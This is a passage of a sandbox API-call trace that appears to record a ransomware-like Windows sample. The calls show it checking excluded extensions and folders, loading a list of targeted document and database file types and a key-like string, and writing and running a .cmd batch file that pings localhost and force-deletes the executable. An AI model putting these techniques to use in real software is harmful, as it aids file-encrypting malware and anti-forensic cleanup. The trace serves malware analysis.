dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW 
(Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_START]", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PROGRAM FILES", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\GAMES", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\APPDATA\\", cchCount1=9, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\APPLICATION DATA\\", cchCount1=18, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\LOCAL SETTINGS\\", cchCount1=16, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TEMP\\", 
cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PROGRAMDATA\\", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BOOT\\", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MSOCACHE\\", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\DEFAULT USER\\", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.833] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\SAMPLE", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.833] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\EXAMPLE", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.833] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\I386", cchCount1=5, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.833] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TEMPORARY", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.833] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TOR BROWSER\\", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.833] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BROWSER", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.833] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BROWSER\\", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.833] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_END]", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 2 [0112.833] GetCurrentThreadId () returned 0xd84 [0112.833] GetCurrentThreadId () returned 0xd84 [0112.833] GetCurrentThreadId () returned 0xd84 [0112.833] FindResourceW (hModule=0x400000, lpName="PRL", lpType=0xa) returned 0x51c498 [0112.833] 
LoadResource (hModule=0x400000, hResInfo=0x51c498) returned 0x516f58 [0112.833] SizeofResource (hModule=0x400000, hResInfo=0x51c498) returned 0x61 [0112.833] LockResource (hResData=0x516f58) returned 0x516f58 [0112.833] FreeResource (hResData=0x516f58) returned 0 [0112.833] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0112.833] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0112.833] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0112.833] LockResource (hResData=0x50d64c) returned 0x50d64c [0112.833] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14150b0, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0112.833] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14150b0, cbMultiByte=38, lpWideCharStr=0x140de4c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0112.833] FreeResource (hResData=0x50d64c) returned 0 [0112.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0112.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x14150b4, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0112.833] GetCurrentThreadId () returned 0xd84 [0112.833] GetCurrentThreadId () returned 0xd84 [0112.833] GetCurrentThreadId () returned 0xd84 [0112.833] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13a4258, cbMultiByte=97, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 97 [0112.833] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, 
lpMultiByteStr=0x13a4258, cbMultiByte=97, lpWideCharStr=0x1372ebc, cchWideChar=97 | out: lpWideCharStr="1CD\r\nDT\r\nDBS\r\nDBF\r\nDBX\r\nMDB\r\nMDF\r\nSDF\r\nACCDB\r\nXLSX\r\nXLS\r\nDOCX\r\nDOC\r\nODS\r\nODT\r\nPDF\r\nJPG\r\nJPEG\r\nTXT") returned 97 [0112.833] CharLowerBuffW (in: lpsz="AST", cchLength=0x3 | out: lpsz="ast") returned 0x3 [0112.833] CharLowerBuffW (in: lpsz="AFN", cchLength=0x3 | out: lpsz="afn") returned 0x3 [0112.833] CharLowerBuffW (in: lpsz="ELST", cchLength=0x4 | out: lpsz="elst") returned 0x4 [0112.833] CharLowerBuffW (in: lpsz="EXE", cchLength=0x3 | out: lpsz="exe") returned 0x3 [0112.833] CharLowerBuffW (in: lpsz="LNK", cchLength=0x3 | out: lpsz="lnk") returned 0x3 [0112.833] CharLowerBuffW (in: lpsz="HTA", cchLength=0x3 | out: lpsz="hta") returned 0x3 [0112.833] CharLowerBuffW (in: lpsz="PEK", cchLength=0x3 | out: lpsz="pek") returned 0x3 [0112.833] CharLowerBuffW (in: lpsz="SEK", cchLength=0x3 | out: lpsz="sek") returned 0x3 [0112.833] CharLowerBuffW (in: lpsz="B10CKED", cchLength=0x7 | out: lpsz="b10cked") returned 0x7 [0112.833] CharLowerBuffW (in: lpsz="TMP", cchLength=0x3 | out: lpsz="tmp") returned 0x3 [0112.833] CharLowerBuffW (in: lpsz="ICO", cchLength=0x3 | out: lpsz="ico") returned 0x3 [0112.834] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"340_LESS_1GB\" \"60000\"" [0112.834] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"340_LESS_1GB\" \"60000\"" [0112.834] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"340_LESS_1GB\" \"60000\"" [0112.834] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" 
\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"340_LESS_1GB\" \"60000\"" [0112.834] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"340_LESS_1GB\" \"60000\"" [0112.834] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"340_LESS_1GB\" \"60000\"" [0112.834] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"340_LESS_1GB\" \"60000\"" [0112.834] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"340_LESS_1GB\" \"60000\"" [0112.834] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"340_LESS_1GB\" \"60000\"" [0112.834] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4071a4, lpParameter=0x13f0df0, dwCreationFlags=0x4, lpThreadId=0x140dd84 | out: lpThreadId=0x140dd84*=0xd9c) returned 0xb8 [0112.834] SetThreadPriority (hThread=0xb8, nPriority=0) returned 1 [0112.834] ResumeThread (hThread=0xb8) returned 0x1 [0112.834] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xea60) returned 0x0 [0113.093] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa44, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\bkm66byk.exe")) returned 0x30 [0113.093] FindResourceW (hModule=0x400000, lpName="STCLR", lpType=0xa) returned 0x51c510 [0113.093] LoadResource (hModule=0x400000, hResInfo=0x51c510) returned 0x5187d4 [0113.094] SizeofResource (hModule=0x400000, 
hResInfo=0x51c510) returned 0x53 [0113.094] LockResource (hResData=0x5187d4) returned 0x5187d4 [0113.094] FreeResource (hResData=0x5187d4) returned 0 [0113.094] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0113.094] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0113.094] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0113.094] LockResource (hResData=0x50d64c) returned 0x50d64c [0113.094] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1415120, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0113.094] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1415120, cbMultiByte=38, lpWideCharStr=0x140df6c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0113.094] FreeResource (hResData=0x50d64c) returned 0 [0113.094] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0113.094] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x1415124, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0113.094] GetCurrentThreadId () returned 0xd84 [0113.094] GetCurrentThreadId () returned 0xd84 [0113.094] GetCurrentThreadId () returned 0xd84 [0113.094] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x140de48, cbMultiByte=83, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0113.094] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x140de48, cbMultiByte=83, lpWideCharStr=0x13a012c, cchWideChar=83 | out: 
lpWideCharStr="[RNDSTR].cmd\r\nping -n 3 localhost\r\ndel /f /q \"[SELF_NAME]\"\r\ndel /f /q \"[SELF_NAME]\"") returned 83 [0113.094] GetTickCount () returned 0x27167 [0113.094] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbb8 | out: lpPerformanceCount=0x12fbb8*=16988313437) returned 1 [0113.094] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="1畔﮴\x12\x1c翻") returned 1 [0113.094] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="A畔﮴\x12\x1c翻") returned 1 [0113.094] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="4畔﮴\x12\x1c翻") returned 1 [0113.094] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="q畔﮴\x12\x1c翻") returned 1 [0113.094] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="O畔﮴\x12\x1c翻") returned 1 [0113.094] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="2畔﮴\x12\x1c翻") returned 1 [0113.094] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="R畔﮴\x12\x1c翻") returned 1 [0113.094] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="H畔﮴\x12\x1c翻") returned 1 [0113.094] CharUpperBuffW (in: lpsz="[RNDSTR].cmd", cchLength=0xc | out: lpsz="[RNDSTR].CMD") returned 0xc [0113.094] CharUpperBuffW (in: 
lpsz="[RNDSTR]", cchLength=0x8 | out: lpsz="[RNDSTR]") returned 0x8 [0113.094] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe", lpszShortPath=0x13ac65c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe") returned 0x30 [0113.094] CharUpperBuffW (in: lpsz="ping -n 3 localhost\r\ndel /f /q \"[SELF_NAME]\"\r\ndel /f /q \"[SELF_NAME]\"\r\n", cchLength=0x47 | out: lpsz="PING -N 3 LOCALHOST\r\nDEL /F /Q \"[SELF_NAME]\"\r\nDEL /F /Q \"[SELF_NAME]\"\r\n") returned 0x47 [0113.094] CharUpperBuffW (in: lpsz="[SELF_NAME]", cchLength=0xb | out: lpsz="[SELF_NAME]") returned 0xb [0113.094] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\1A4qO2RH.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\1a4qo2rh.cmd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe8 [0113.095] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\"\r\n", cchWideChar=145, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 145 [0113.095] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\"\r\n", cchWideChar=145, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 145 [0113.095] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\"\r\ndel /f /q 
\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\"\r\n", cchWideChar=145, lpMultiByteStr=0x138fbd8, cbMultiByte=145, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\"\r\n", lpUsedDefaultChar=0x0) returned 145 [0113.095] WriteFile (in: hFile=0xe8, lpBuffer=0x138fbd8*, nNumberOfBytesToWrite=0x91, lpNumberOfBytesWritten=0x12fb60, lpOverlapped=0x0 | out: lpBuffer=0x138fbd8*, lpNumberOfBytesWritten=0x12fb60*=0x91, lpOverlapped=0x0) returned 1 [0113.096] CloseHandle (hObject=0xe8) returned 1 [0113.096] GetCurrentThreadId () returned 0xd84 [0113.096] GetCurrentThreadId () returned 0xd84 [0113.096] GetCurrentThreadId () returned 0xd84 [0113.097] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\1A4qO2RH.cmd\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fc14*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fc04 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\1A4qO2RH.cmd\"", lpProcessInformation=0x12fc04*(hProcess=0xec, hThread=0xe8, dwProcessId=0xdc4, dwThreadId=0xdc8)) returned 1 [0113.110] CloseHandle (hObject=0xec) returned 1 [0113.110] CloseHandle (hObject=0xe8) returned 1 [0113.110] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"340_LESS_1GB\" \"60000\"" 
[0113.110] GetCurrentThreadId () returned 0xd84 [0113.110] GetCurrentThreadId () returned 0xd84 [0113.110] GetCurrentThreadId () returned 0xd84 [0113.110] GetCurrentThreadId () returned 0xd84 [0113.110] GetCurrentThreadId () returned 0xd84 [0113.110] GetCurrentThreadId () returned 0xd84 [0113.110] GetCurrentThreadId () returned 0xd84 [0113.110] GetCurrentThreadId () returned 0xd84 [0113.111] GetCurrentThreadId () returned 0xd84 [0113.111] GetCurrentThreadId () returned 0xd84 [0113.111] GetCurrentThreadId () returned 0xd84 [0113.111] GetCurrentThreadId () returned 0xd84 [0113.111] GetCurrentThreadId () returned 0xd84 [0113.111] GetCurrentThreadId () returned 0xd84 [0113.111] GetCurrentThreadId () returned 0xd84 [0113.111] GetCurrentThreadId () returned 0xd84 [0113.111] GetCurrentThreadId () returned 0xd84 [0113.111] GetCurrentThreadId () returned 0xd84 [0113.111] GetCurrentThreadId () returned 0xd84 [0113.111] GetCurrentThreadId () returned 0xd84 [0113.111] GetCurrentThreadId () returned 0xd84 [0113.111] GetCurrentThreadId () returned 0xd84 [0113.111] GetCurrentThreadId () returned 0xd84 [0113.111] GetCurrentThreadId () returned 0xd84 [0113.111] GetCurrentThreadId () returned 0xd84 [0113.111] GetCurrentThreadId () returned 0xd84 [0113.111] GetCurrentThreadId () returned 0xd84 [0113.111] WSACleanup () returned 0 [0113.457] FreeLibrary (hLibModule=0x77380000) returned 1 [0113.457] GetCurrentThreadId () returned 0xd84 [0113.457] GetCurrentThreadId () returned 0xd84 [0113.457] GetCurrentProcess () returned 0xffffffff [0113.457] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x400000, lpBuffer=0x12fbd8, dwLength=0x1c | out: lpBuffer=0x12fbd8*(BaseAddress=0x400000, AllocationBase=0x400000, AllocationProtect=0x40, RegionSize=0x11d000, State=0x1000, Protect=0x40, Type=0x20000)) returned 0x1c [0113.457] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x51d000, lpBuffer=0x12fbd8, dwLength=0x1c | out: lpBuffer=0x12fbd8*(BaseAddress=0x51d000, AllocationBase=0x0, 
AllocationProtect=0x0, RegionSize=0x3000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0113.457] GetCurrentThreadId () returned 0xd84 [0113.457] GetCurrentThreadId () returned 0xd84 [0113.457] ResetEvent (hEvent=0x88) returned 1 [0113.457] GetCurrentThreadId () returned 0xd84 [0113.457] GetCurrentThreadId () returned 0xd84 [0113.457] GetCurrentThreadId () returned 0xd84 [0113.457] ResetEvent (hEvent=0x88) returned 1 [0113.457] GetCurrentThreadId () returned 0xd84 [0113.457] GetCurrentThreadId () returned 0xd84 [0113.457] GetCurrentThreadId () returned 0xd84 [0113.457] GetCurrentThreadId () returned 0xd84 [0113.458] GetCurrentThreadId () returned 0xd84 [0113.458] GetCurrentThreadId () returned 0xd84 [0113.458] GetCurrentThreadId () returned 0xd84 [0113.458] GetCurrentThreadId () returned 0xd84 [0113.458] GetCurrentThreadId () returned 0xd84 [0113.458] GetCurrentThreadId () returned 0xd84 [0113.458] GetCurrentThreadId () returned 0xd84 [0113.458] GetCurrentThreadId () returned 0xd84 [0113.458] GetCurrentThreadId () returned 0xd84 [0113.458] CloseHandle (hObject=0x88) returned 1 [0113.458] CloseHandle (hObject=0x8c) returned 1 [0113.458] CloseHandle (hObject=0x84) returned 1 [0113.458] GetCurrentThreadId () returned 0xd84 [0113.458] GetCurrentThreadId () returned 0xd84 [0113.458] GetCurrentThreadId () returned 0xd84 [0113.458] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.458] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.458] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.458] GetLocalTime (in: lpSystemTime=0x12fc1c | out: 
